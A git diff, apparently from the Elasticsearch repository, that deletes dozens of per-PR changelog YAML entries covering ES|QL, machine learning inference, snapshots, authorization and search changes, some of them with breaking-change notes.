--- a/docs/changelog/127199.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127199 -summary: Disable a bugged commit -area: ES|QL -type: bug -issues: - - 127197 diff --git a/docs/changelog/127201.yaml b/docs/changelog/127201.yaml deleted file mode 100644 index 5a205c65785b0..0000000000000 --- a/docs/changelog/127201.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127201 -summary: Emit ordinal output block for values aggregate -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127229.yaml b/docs/changelog/127229.yaml deleted file mode 100644 index fe551c95c6d01..0000000000000 --- a/docs/changelog/127229.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127229 -summary: Return BAD_REQUEST when a field scorer references a missing field -area: Ranking -type: bug -issues: - - 127162 diff --git a/docs/changelog/127250.yaml b/docs/changelog/127250.yaml deleted file mode 100644 index 44a41645bd6c3..0000000000000 --- a/docs/changelog/127250.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127250 -summary: Do not apply further shard snapshot status updates after shard snapshot is - complete -area: Snapshot/Restore -type: bug -issues: [] diff --git a/docs/changelog/127254.yaml b/docs/changelog/127254.yaml deleted file mode 100644 index 366b1a2cce00b..0000000000000 --- a/docs/changelog/127254.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127254 -summary: "[ML] Add HuggingFace Chat Completion support to the Inference Plugin" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/127267.yaml b/docs/changelog/127267.yaml deleted file mode 100644 index 3ec9828cabe84..0000000000000 --- a/docs/changelog/127267.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127267 -summary: Bypass competitive iteration in single filter bucket case -area: "Aggregations" -type: bug -issues: [127262] diff --git a/docs/changelog/127285.yaml b/docs/changelog/127285.yaml deleted file mode 100644 index e735580b5f310..0000000000000 --- a/docs/changelog/127285.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127285 -summary: Restore model registry validation for the semantic text field -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/127299.yaml b/docs/changelog/127299.yaml deleted file mode 100644 index d83551fbbe1aa..0000000000000 --- a/docs/changelog/127299.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127299 -summary: Introduce `AggregateMetricDoubleBlock` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127314.yaml b/docs/changelog/127314.yaml deleted file mode 100644 index 412fa2e78ffaf..0000000000000 --- a/docs/changelog/127314.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127314 -summary: "[Failure store] Introduce dedicated failure store lifecycle configuration" -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/127321.yaml b/docs/changelog/127321.yaml deleted file mode 100644 index 16191d9c34442..0000000000000 --- a/docs/changelog/127321.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127321 -summary: Granting `kibana_system` reserved role access to "all" privileges to `.adhoc.alerts*` - and `.internal.adhoc.alerts*` indices -area: Authorization -type: enhancement -issues: [] diff --git a/docs/changelog/127330.yaml b/docs/changelog/127330.yaml deleted file mode 100644 index 059c8185c0060..0000000000000 --- a/docs/changelog/127330.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127330 -summary: Move unpromotable relocations to its own transport action -area: Recovery -type: enhancement -issues: [] diff --git a/docs/changelog/127343.yaml b/docs/changelog/127343.yaml deleted file mode 
100644 index 3d3e12799d163..0000000000000 --- a/docs/changelog/127343.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127343 -summary: Upgrade to Lucene 10.2.1 -area: Search -type: upgrade -issues: [] diff --git a/docs/changelog/127348.yaml b/docs/changelog/127348.yaml deleted file mode 100644 index 933869b2a9d55..0000000000000 --- a/docs/changelog/127348.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127348 -summary: Speed loading stored fields -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127351.yaml b/docs/changelog/127351.yaml deleted file mode 100644 index ca16c5695f004..0000000000000 --- a/docs/changelog/127351.yaml +++ /dev/null @@ -1,16 +0,0 @@ -pr: 127351 -summary: Allow partial results by default in ES|QL -area: ES|QL -type: breaking -issues: [122802] - -breaking: - title: Allow partial results by default in ES|QL - area: ES|QL - details: >- - In earlier versions of {es}, ES|QL would fail the entire query if it encountered any error. ES|QL now returns partial results instead of failing when encountering errors. - - impact: >- - Callers should check the `is_partial` flag returned in the response to determine if the result is partial or complete. If returning partial results is not desired, this option can be overridden per request via an `allow_partial_results` parameter in the query URL or globally via the cluster setting `esql.query.allow_partial_results`. - - notable: true diff --git a/docs/changelog/127355.yaml b/docs/changelog/127355.yaml deleted file mode 100644 index 28ead562ed8c5..0000000000000 --- a/docs/changelog/127355.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127355 -summary: '`text ==` and `text !=` pushdown' -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127371.yaml b/docs/changelog/127371.yaml deleted file mode 100644 index 10f5f17243193..0000000000000 --- a/docs/changelog/127371.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127371 -summary: Add cancellation support in `TransportGetAllocationStatsAction` -area: Allocation -type: feature -issues: - - 123248 diff --git a/docs/changelog/127472.yaml b/docs/changelog/127472.yaml deleted file mode 100644 index b91288f82bcdd..0000000000000 --- a/docs/changelog/127472.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127472 -summary: Change queries ID to be the same as the async -area: ES|QL -type: feature -issues: - - 127187 diff --git a/docs/changelog/127522.yaml b/docs/changelog/127522.yaml deleted file mode 100644 index 344456ac4a31f..0000000000000 --- a/docs/changelog/127522.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127522 -summary: Use INTERNAL_INGEST for Inference -area: Machine Learning -type: bug -issues: - - 127519 diff --git a/docs/changelog/127524.yaml b/docs/changelog/127524.yaml deleted file mode 100644 index d11599ddcde58..0000000000000 --- a/docs/changelog/127524.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127524 -summary: Resolve groupings in aggregate before resolving references to groupings in - the aggregations -area: ES|QL -type: bug -issues: [] diff --git a/docs/changelog/127549.yaml b/docs/changelog/127549.yaml deleted file mode 100644 index 5f24111d22689..0000000000000 --- a/docs/changelog/127549.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127549 -summary: Add local optimizations for `constant_keyword` -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127573.yaml b/docs/changelog/127573.yaml deleted file mode 100644 index b0bc1548c09f7..0000000000000 --- a/docs/changelog/127573.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127573 -summary: "[Failure store] Introduce default 
retention for failure indices" -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/127582.yaml b/docs/changelog/127582.yaml deleted file mode 100644 index 589c20e8f2fbc..0000000000000 --- a/docs/changelog/127582.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127582 -summary: Specialize aggs `AddInput` for each block type -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127583.yaml b/docs/changelog/127583.yaml deleted file mode 100644 index 6e315a2b827b9..0000000000000 --- a/docs/changelog/127583.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127583 -summary: Add optimization to purge join on null merge key -area: ES|QL -type: enhancement -issues: - - 125577 diff --git a/docs/changelog/127628.yaml b/docs/changelog/127628.yaml deleted file mode 100644 index 083b425f13eb4..0000000000000 --- a/docs/changelog/127628.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127628 -summary: Ensure config reload on ..data symlink switch for CSI driver support -area: Infra/Settings -type: enhancement -issues: [] diff --git a/docs/changelog/127629.yaml b/docs/changelog/127629.yaml deleted file mode 100644 index 20ae5eebfb3a4..0000000000000 --- a/docs/changelog/127629.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127629 -summary: ES|QL SAMPLE aggregation function -area: Machine Learning -type: feature -issues: [] diff --git a/docs/changelog/127636.yaml b/docs/changelog/127636.yaml deleted file mode 100644 index e329eb4bce333..0000000000000 --- a/docs/changelog/127636.yaml +++ /dev/null @@ -1,17 +0,0 @@ -pr: 127636 -summary: Disallow mixed quoted/unquoted patterns in FROM -area: ES|QL -type: breaking -issues: - - 122651 -breaking: - title: Disallow mixed quoted/unquoted patterns in FROM - area: ES|QL - details: "Previously, the ES|QL grammar allowed users to individually quote constituent strings in index patterns\ - \ such as \"remote_cluster\":\"index_name\". This would allow users to write complex malformed index patterns\ - \ that often slip through the grammar and subsequent validation. This could result in runtime errors\ - \ that can be misleading. This change simplifies the grammar to reject such malformed index patterns early,\ - \ at the parsing stage, allowing users to write simpler queries and see more relevant and meaningful\ - \ errors." - impact: "Users can write queries with simpler index patterns and see more meaningful and relevant errors."
- notable: false diff --git a/docs/changelog/127661.yaml b/docs/changelog/127661.yaml deleted file mode 100644 index 66c8336963271..0000000000000 --- a/docs/changelog/127661.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127661 -summary: Add MATCH_PHRASE -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127664.yaml b/docs/changelog/127664.yaml deleted file mode 100644 index 6290607b987f7..0000000000000 --- a/docs/changelog/127664.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127664 -summary: Exclude `semantic_text` subfields from field capabilities API -area: "Mapping" -type: enhancement -issues: [] diff --git a/docs/changelog/127668.yaml b/docs/changelog/127668.yaml deleted file mode 100644 index 04d219e543b12..0000000000000 --- a/docs/changelog/127668.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127668 -summary: Fix transport versions -area: "ES|QL" -type: bug -issues: - - 127667 diff --git a/docs/changelog/127731.yaml b/docs/changelog/127731.yaml deleted file mode 100644 index 2641c96e2e05b..0000000000000 --- a/docs/changelog/127731.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127731 -summary: ESQL - Enable telemetry for COMPLETION command -area: Search -type: feature -issues: [] diff --git a/docs/changelog/127734.yaml b/docs/changelog/127734.yaml deleted file mode 100644 index d33b201744c46..0000000000000 --- a/docs/changelog/127734.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127734 -summary: Run coordinating `can_match` in field-caps -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/127767.yaml b/docs/changelog/127767.yaml deleted file mode 100644 index 659fc31fbaf83..0000000000000 --- a/docs/changelog/127767.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127767 -summary: Integrate `OpenAi` Chat Completion in `SageMaker` -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/127796.yaml b/docs/changelog/127796.yaml deleted file mode 100644 index c87e777f83d40..0000000000000 --- a/docs/changelog/127796.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127796 -summary: Do not respect synthetic_source_keep=arrays if type parses arrays -area: Mapping -type: enhancement -issues: - - 126155 diff --git a/docs/changelog/127797.yaml b/docs/changelog/127797.yaml deleted file mode 100644 index 8fca3da004130..0000000000000 --- a/docs/changelog/127797.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127797 -summary: "Date nanos implicit casting in union types option #2" -area: ES|QL -type: enhancement -issues: - - 110009 diff --git a/docs/changelog/127817.yaml b/docs/changelog/127817.yaml deleted file mode 100644 index 7c0f78b39a809..0000000000000 --- a/docs/changelog/127817.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127817 -summary: Replace auto-read with proper flow-control in HTTP pipeline -area: Network -type: enhancement -issues: [] diff --git a/docs/changelog/127849.yaml b/docs/changelog/127849.yaml deleted file mode 100644 index 4d5b747b35011..0000000000000 --- a/docs/changelog/127849.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127849 -summary: Optimize ordinal inputs in Values aggregation -area: "ES|QL" -type: enhancement -issues: [] diff --git a/docs/changelog/127910.yaml b/docs/changelog/127910.yaml deleted file mode 100644 index 3b3641cd17f0f..0000000000000 --- a/docs/changelog/127910.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127910 -summary: Add Microsoft Graph Delegated Authorization Realm Plugin -area: Authorization -type: enhancement -issues: [] diff --git a/docs/changelog/127939.yaml b/docs/changelog/127939.yaml deleted file mode 100644 index 7cc67e6207a85..0000000000000 
--- a/docs/changelog/127939.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127939 -summary: Add Custom inference service -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/127966.yaml b/docs/changelog/127966.yaml deleted file mode 100644 index 0c896715149bf..0000000000000 --- a/docs/changelog/127966.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127966 -summary: "[ML] Add Rerank support to the Inference Plugin" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/127968.yaml b/docs/changelog/127968.yaml deleted file mode 100644 index 5cc867d0d2637..0000000000000 --- a/docs/changelog/127968.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 127968 -summary: "Enable sort optimization on int, short and byte fields" -area: Search -type: enhancement -issues: - - 127965 diff --git a/docs/changelog/127988.yaml b/docs/changelog/127988.yaml deleted file mode 100644 index 5cb3540f90b08..0000000000000 --- a/docs/changelog/127988.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 127988 -summary: Add emit time to hash aggregation status -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128025.yaml b/docs/changelog/128025.yaml deleted file mode 100644 index 61a9a80fabfb1..0000000000000 --- a/docs/changelog/128025.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128025 -summary: "Set `connection: close` header on shutdown" -area: Network -type: enhancement -issues: - - 127984 diff --git a/docs/changelog/128063.yaml b/docs/changelog/128063.yaml deleted file mode 100644 index 281d80d1c6ec0..0000000000000 --- a/docs/changelog/128063.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128063 -summary: More efficient sort in `tryRelocateShard` -area: Allocation -type: enhancement -issues: [] diff --git a/docs/changelog/128099.yaml b/docs/changelog/128099.yaml deleted file mode 100644 index 1f26cb00bd75d..0000000000000 --- a/docs/changelog/128099.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128099 -summary: Remove first `FlowControlHandler` from HTTP pipeline -area: Network -type: enhancement -issues: [] diff --git a/docs/changelog/128105.yaml b/docs/changelog/128105.yaml deleted file mode 100644 index 2dd6b55f54d24..0000000000000 --- a/docs/changelog/128105.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128105 -summary: "Adding Google VertexAI chat completion integration" -area: Inference -type: enhancement -issues: [ ] diff --git a/docs/changelog/128139.yaml b/docs/changelog/128139.yaml deleted file mode 100644 index b21e2c744f4d9..0000000000000 --- a/docs/changelog/128139.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128139 -summary: Skip indexing points for `seq_no` in tsdb and logsdb -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/128163.yaml b/docs/changelog/128163.yaml deleted file mode 100644 index 6cebf3738017f..0000000000000 --- a/docs/changelog/128163.yaml +++ /dev/null @@ -1,17 +0,0 @@ -pr: 128163 -summary: Make `skip_unavailable` catch all errors -area: ES|QL -type: breaking -issues: [ ] -breaking: - title: Cluster setting "skip_unavailable" catches all runtime errors - area: ES|QL - details: "If `skip_unavailable` is set to `true`, the runtime errors from this cluster\ - \ do not lead to a failure of the query. Instead, the cluster is set to `skipped`\ - \ or `partial` status, and the query execution continues. This is a breaking change\ - \ from previous versions, where `skip_unavailable` only applied to errors related\ - \ to a cluster being unavailable." - impact: "The errors on remote clusters, e.g. 
missing indices, will not lead to a\ - \ failure of the query. Instead, the cluster is set to `skipped` or `partial` status\ - \ in the response metadata." - notable: false diff --git a/docs/changelog/128176.yaml b/docs/changelog/128176.yaml deleted file mode 100644 index 2cf76c4513772..0000000000000 --- a/docs/changelog/128176.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128176 -summary: Implement SAML custom attributes support for Identity Provider -area: Authentication -type: enhancement -issues: [] diff --git a/docs/changelog/128213.yaml b/docs/changelog/128213.yaml deleted file mode 100644 index a1f108cbbec8e..0000000000000 --- a/docs/changelog/128213.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128213 -summary: Refactor `SourceProvider` creation to consistently use `MappingLookup` -area: Mapping -type: enhancement -issues: [] diff --git a/docs/changelog/128218.yaml b/docs/changelog/128218.yaml deleted file mode 100644 index a3a291aa8d580..0000000000000 --- a/docs/changelog/128218.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128218 -summary: Improve exception for trained model deployment scale up timeout -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/128241.yaml b/docs/changelog/128241.yaml deleted file mode 100644 index 26e3154fb7fde..0000000000000 --- a/docs/changelog/128241.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128241 -summary: Adding VoyageAI's v3.5 models -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/128263.yaml b/docs/changelog/128263.yaml deleted file mode 100644 index 27ed06878dd40..0000000000000 --- a/docs/changelog/128263.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128263 -summary: Allow lookup join on mixed numeric fields -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128273.yaml b/docs/changelog/128273.yaml deleted file mode 100644 index 0f6a7ce2561d7..0000000000000 --- a/docs/changelog/128273.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128273 -summary: Improve get-snapshots message for unreadable repository -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/128278.yaml b/docs/changelog/128278.yaml deleted file mode 100644 index e8cc008a393df..0000000000000 --- a/docs/changelog/128278.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128278 -summary: ROUND_TO function -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128291.yaml b/docs/changelog/128291.yaml deleted file mode 100644 index 097bd8a44a4c6..0000000000000 --- a/docs/changelog/128291.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128291 -summary: Make `dense_vector` fields updatable to bbq_flat/bbq_hnsw -area: Vector Search -type: enhancement -issues: [] diff --git a/docs/changelog/128298.yaml b/docs/changelog/128298.yaml deleted file mode 100644 index bfa16cb509304..0000000000000 --- a/docs/changelog/128298.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128298 -summary: Better handling of node ids from shutdown metadata (avoid NPE on already removed nodes) -area: Infra/Node Lifecycle -type: bug -issues: - - 100201 diff --git a/docs/changelog/128314.yaml b/docs/changelog/128314.yaml deleted file mode 100644 index f63a06e68177e..0000000000000 --- a/docs/changelog/128314.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128314 -summary: Fix NPE in APMTracer through `RestController` -area: Infra/REST API -type: bug -issues: [] diff --git a/docs/changelog/128323.yaml b/docs/changelog/128323.yaml deleted file mode 100644 index b6114c26ddc6e..0000000000000 --- a/docs/changelog/128323.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 
128323 -summary: "Fix: Allow non-score secondary sorts in pinned retriever sub-retrievers" -area: Relevance -type: bug -issues: [] diff --git a/docs/changelog/128361.yaml b/docs/changelog/128361.yaml deleted file mode 100644 index 901c1141afe90..0000000000000 --- a/docs/changelog/128361.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128361 -summary: The follower index should wait until the time series end time passes before unfollowing the leader index. -area: ILM+SLM -type: bug -issues: - - 128129 diff --git a/docs/changelog/128393.yaml b/docs/changelog/128393.yaml deleted file mode 100644 index 1f4a2bf8697f3..0000000000000 --- a/docs/changelog/128393.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128393 -summary: Pushdown constructs doing case-insensitive regexes -area: ES|QL -type: enhancement -issues: - - 127479 diff --git a/docs/changelog/128396.yaml b/docs/changelog/128396.yaml deleted file mode 100644 index 6e19a83d156e5..0000000000000 --- a/docs/changelog/128396.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128396 -summary: Delegated authorization using Microsoft Graph (SDK) -area: Authorization -type: feature -issues: [] diff --git a/docs/changelog/128399.yaml b/docs/changelog/128399.yaml deleted file mode 100644 index 042c1b9153f72..0000000000000 --- a/docs/changelog/128399.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128399 -summary: Allow missing shard stats for restarted nodes for `_snapshot/_status` -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/128405.yaml b/docs/changelog/128405.yaml deleted file mode 100644 index aefa068814747..0000000000000 --- a/docs/changelog/128405.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128405 -summary: Modify the mechanism to pause indexing -area: Distributed -type: bug -issues: [] diff --git a/docs/changelog/128449.yaml b/docs/changelog/128449.yaml deleted file mode 100644 index 12798783942e6..0000000000000 --- a/docs/changelog/128449.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128449 -summary: "[Draft] Support concurrent multipart uploads in Azure" -area: Snapshot/Restore -type: enhancement -issues: [] diff --git a/docs/changelog/128464.yaml b/docs/changelog/128464.yaml deleted file mode 100644 index b8cd59c82b77f..0000000000000 --- a/docs/changelog/128464.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128464 -summary: Add support for parameters in LIMIT command -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128473.yaml b/docs/changelog/128473.yaml deleted file mode 100644 index 447ff998b1610..0000000000000 --- a/docs/changelog/128473.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128473 -summary: Conditionally force sequential reading in `LuceneSyntheticSourceChangesSnapshot` -area: Logs -type: enhancement -issues: [] diff --git a/docs/changelog/128504.yaml b/docs/changelog/128504.yaml deleted file mode 100644 index 7b451d27520aa..0000000000000 --- a/docs/changelog/128504.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128504 -summary: Add l2_norm normalization support to linear retriever -area: Relevance -type: enhancement -issues: [] diff --git a/docs/changelog/128509.yaml b/docs/changelog/128509.yaml deleted file mode 100644 index 2c51b4b684583..0000000000000 --- a/docs/changelog/128509.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128509 -summary: Use default Lucene postings format when index mode is standard. 
-area: Codec -type: enhancement -issues: [] diff --git a/docs/changelog/128519.yaml b/docs/changelog/128519.yaml deleted file mode 100644 index 20352e7102e98..0000000000000 --- a/docs/changelog/128519.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128519 -summary: Add support for LOOKUP JOIN on aliases -area: ES|QL -type: enhancement -issues: [] diff --git a/docs/changelog/128538.yaml b/docs/changelog/128538.yaml deleted file mode 100644 index bd4ab34ce2dca..0000000000000 --- a/docs/changelog/128538.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128538 -summary: "Added Mistral Chat Completion support to the Inference Plugin" -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/128584.yaml b/docs/changelog/128584.yaml deleted file mode 100644 index e5e380559786d..0000000000000 --- a/docs/changelog/128584.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128584 -summary: '`InferenceService` support aliases' -area: Machine Learning -type: enhancement -issues: [] diff --git a/docs/changelog/128613.yaml b/docs/changelog/128613.yaml deleted file mode 100644 index 4d5d7bba03544..0000000000000 --- a/docs/changelog/128613.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128613 -summary: Improve support for bytecode patching signed jars -area: Infra/Core -type: enhancement -issues: [] diff --git a/docs/changelog/128615.yaml b/docs/changelog/128615.yaml deleted file mode 100644 index 9270c701c1bec..0000000000000 --- a/docs/changelog/128615.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128615 -summary: Fix and test off-heap stats when using direct IO for accessing the raw vectors -area: Vector Search -type: bug -issues: [] diff --git a/docs/changelog/128635.yaml b/docs/changelog/128635.yaml deleted file mode 100644 index 19a1dd0404ce1..0000000000000 --- a/docs/changelog/128635.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128635 -summary: Add `state` query param to Get snapshots API -area: Snapshot/Restore -type: enhancement -issues: - - 97446 diff --git a/docs/changelog/128653.yaml b/docs/changelog/128653.yaml deleted file mode 100644 index 6ecf29a22fbc2..0000000000000 --- a/docs/changelog/128653.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128653 -summary: Add retry for `AccessDeniedException` in `AbstractFileWatchingService` -area: Infra/Settings -type: bug -issues: [] diff --git a/docs/changelog/128694.yaml b/docs/changelog/128694.yaml deleted file mode 100644 index 031bec11899e5..0000000000000 --- a/docs/changelog/128694.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128694 -summary: "Adding Google VertexAI completion integration" -area: Inference -type: enhancement -issues: [ ] diff --git a/docs/changelog/128735.yaml b/docs/changelog/128735.yaml deleted file mode 100644 index 33ea2e4e97d91..0000000000000 --- a/docs/changelog/128735.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128735 -summary: Add option to include or exclude vectors from `_source` retrieval -area: Vector Search -type: feature -issues: [] diff --git a/docs/changelog/128736.yaml b/docs/changelog/128736.yaml deleted file mode 100644 index 6139acfd9fd4f..0000000000000 --- a/docs/changelog/128736.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128736 -summary: Add `index.lifecycle.skip` index-scoped setting to instruct ILM to skip processing specific indices -area: ILM+SLM -type: enhancement -issues: [] diff --git a/docs/changelog/128737.yaml b/docs/changelog/128737.yaml deleted file mode 100644 index 5a710d4f836f5..0000000000000 --- a/docs/changelog/128737.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 128737 -summary: React more promptly to task cancellation while waiting for
the cluster to - unblock -area: Task Management -type: enhancement -issues: - - 117971 diff --git a/docs/changelog/128746.yaml b/docs/changelog/128746.yaml deleted file mode 100644 index 028713ada4828..0000000000000 --- a/docs/changelog/128746.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128746 -summary: Fix computation of last block size in Azure concurrent multipart uploads -area: Snapshot/Restore -type: bug -issues: [] diff --git a/docs/changelog/128750.yaml b/docs/changelog/128750.yaml deleted file mode 100644 index 55971accbcb37..0000000000000 --- a/docs/changelog/128750.yaml +++ /dev/null @@ -1,7 +0,0 @@ -pr: 128750 -summary: Fix conversion of a Lucene wildcard pattern to a regexp -area: ES|QL -type: bug -issues: - - 128677 - - 128676 diff --git a/docs/changelog/128788.yaml b/docs/changelog/128788.yaml deleted file mode 100644 index e88444c67a1b3..0000000000000 --- a/docs/changelog/128788.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 105773 -summary: Inject an unfollow action before executing a downsample action in ILM -area: ILM+SLM -type: bug -issues: - - 105773 diff --git a/docs/changelog/128798.yaml b/docs/changelog/128798.yaml deleted file mode 100644 index d763b4d726458..0000000000000 --- a/docs/changelog/128798.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128798 -summary: Add transport version support for IDP_CUSTOM_SAML_ATTRIBUTES_ADDED_8_19 -area: IdentityProvider -type: enhancement -issues: [] diff --git a/docs/changelog/128805.yaml b/docs/changelog/128805.yaml deleted file mode 100644 index 6236649e17aa8..0000000000000 --- a/docs/changelog/128805.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128805 -summary: Add "extension" attribute validation to IdP SPs -area: IdentityProvider -type: enhancement -issues: [] diff --git a/docs/changelog/128848.yaml b/docs/changelog/128848.yaml deleted file mode 100644 index a928206d5568d..0000000000000 --- a/docs/changelog/128848.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128848 -summary: Add `bucketedSort` based on int -area: Search -type: enhancement -issues: [] diff --git a/docs/changelog/128854.yaml b/docs/changelog/128854.yaml deleted file mode 100644 index 65ef8829e4418..0000000000000 --- a/docs/changelog/128854.yaml +++ /dev/null @@ -1,11 +0,0 @@ -pr: 128854 -summary: Mark token pruning for sparse vector as GA -area: Machine Learning -type: feature -issues: [] -highlight: - title: Mark Token Pruning for Sparse Vector as GA - body: |- - Token pruning for sparse_vector queries has been live since 8.13 as tech preview. - As of 8.19.0 and 9.1.0, this is now generally available. 
- notable: true diff --git a/docs/changelog/128858.yaml b/docs/changelog/128858.yaml deleted file mode 100644 index 41c13e8c34ad8..0000000000000 --- a/docs/changelog/128858.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128858 -summary: Fix unsupported privileges error message during role and API key crea… -area: Authorization -type: enhancement -issues: - - 128132 diff --git a/docs/changelog/128870.yaml b/docs/changelog/128870.yaml deleted file mode 100644 index dbeee3c7b74ce..0000000000000 --- a/docs/changelog/128870.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128870 -summary: Check `TooComplex` exception for `HasPrivileges` body -area: Authorization -type: enhancement -issues: [] diff --git a/docs/changelog/128895.yaml b/docs/changelog/128895.yaml deleted file mode 100644 index a1487e47ebd36..0000000000000 --- a/docs/changelog/128895.yaml +++ /dev/null @@ -1,6 +0,0 @@ -pr: 128895 -summary: Workaround for RLike handling of empty lang pattern -area: ES|QL -type: bug -issues: - - 128813 diff --git a/docs/changelog/128913.yml b/docs/changelog/128913.yml deleted file mode 100644 index 623897bb272a1..0000000000000 --- a/docs/changelog/128913.yml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128913 -summary: "[apm-data] Enable 'date_detection' for all apm data streams" -area: Data streams -type: enhancement -issues: [] diff --git a/docs/changelog/128914.yaml b/docs/changelog/128914.yaml deleted file mode 100644 index e2e9eed6558af..0000000000000 --- a/docs/changelog/128914.yaml +++ /dev/null @@ -1,5 +0,0 @@ -pr: 128914 -summary: Make Adaptive Allocations Scale to Zero configurable and set default to 24h -area: Machine Learning -type: enhancement -issues: [] diff --git 